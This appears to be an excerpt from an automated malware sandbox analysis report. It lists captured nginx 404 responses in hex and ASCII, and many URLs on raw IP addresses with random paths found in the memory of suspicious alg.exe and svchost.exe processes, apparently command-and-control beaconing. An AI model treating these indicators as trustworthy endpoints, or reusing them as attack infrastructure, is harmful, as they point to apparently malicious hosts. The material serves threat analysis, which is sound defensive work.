              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:54 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.27.2; Date: Tue, 08 Oct 2024 13:29:13 GMT; Transfer-Encoding: chunked; Connection: keep-alive; Keep-Alive: timeout=20; Data Raw: 30 0d 0a 0d 0a; Data Ascii: 0
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.27.2; Date: Tue, 08 Oct 2024 13:29:21 GMT; Transfer-Encoding: chunked; Connection: keep-alive; Keep-Alive: timeout=20; Data Raw: 30 0d 0a 0d 0a; Data Ascii: 0
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Tue, 08 Oct 2024 13:29:34 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Tue, 08 Oct 2024 13:29:34 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Tue, 08 Oct 2024 13:29:50 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Tue, 08 Oct 2024 13:29:50 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Tue, 08 Oct 2024 13:31:44 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Tue, 08 Oct 2024 13:31:44 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Tue, 08 Oct 2024 13:31:51 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Tue, 08 Oct 2024 13:31:51 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150/
              Source: alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150/3
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2550628200.00000000030A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150/hrvgX
              Source: alg.exe, 00000008.00000003.2431200193.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2416150637.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2440149146.0000000000573000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150/jaumpxrl
              Source: alg.exe, 00000008.00000003.2316109693.0000000000530000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150/scwkixjormncu
              Source: alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150/scwkixjormncus
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2550628200.00000000030A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150:80/hqdytjqsnbtC
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2550628200.00000000030A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150:80/hrvgrobat
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://165.160.13.20/ptbejgswjfxl
              Source: alg.exe, 00000008.00000003.2361537798.000000000057E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.138/d
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143/
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143/$
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143/0
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143/atyxaeuca
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143/dgcyhyi
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143/nljwtdwahh
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143/nljwtdwahhgs
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143/t
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.143:80/xjjg
              Source: alg.exe, 00000008.00000003.2614951526.0000000000590000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2573297149.000000000058F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2564994395.000000000058E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2599053354.000000000058F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/aky
              Source: alg.exe, 00000008.00000003.1904970187.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aky.177/dq
              Source: alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/akyttings
              Source: alg.exe, 00000008.00000003.2531077401.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/bc
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/dxsssktqcq
              Source: alg.exe, 00000008.00000003.3137092544.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3163550787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3142560146.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3154349720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3149933208.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ekoddjskuurntxll
              Source: alg.exe, 00000008.00000003.2981382953.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/gbqdupu
              Source: alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ky
              Source: alg.exe, 00000008.00000003.1922932295.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1913832298.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/akythernet0-QoS
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/byear
              Source: alg.exe, 00000008.00000003.2846373705.0000000000590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/
              Source: alg.exe, 00000008.00000003.2644014392.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/hbv
              Source: alg.exe, 00000008.00000003.3163550787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3179831563.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3142560146.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3170087253.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3154349720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3149933208.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/ipraobeqvefqwo~J
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/weir
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/ewjlslyiisf
              Source: alg.exe, 00000008.00000003.2396437927.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/pboamknl
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3023182878.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3013990554.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/qnguomsjnupgmlrKG
              Source: alg.exe, 00000008.00000003.2913758256.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2903231630.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2952832694.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/flkouthsl
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/gmghpoftyccoynqy
              Source: alg.exe, 00000008.00000003.2699036567.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/ieicusmwh
              Source: alg.exe, 00000008.00000003.2458126956.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2459638272.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/dpntwbnivmh
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/nxbumxilirhmvku
              Source: alg.exe, 00000008.00000003.2678532380.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2724357178.000000000057E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2735370442.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/rkgoodhecptjykcl
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/cblcujxhilpbxlv
              Source: alg.exe, 00000008.00000003.2644014392.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/eevmjkkfks
              Source: alg.exe, 00000008.00000003.3191302720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3201005428.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/iasdsuhvtygftfd~J
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/jweaqenrkqbo
              Source: alg.exe, 00000008.00000003.2678532380.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/snachosinlefnrw
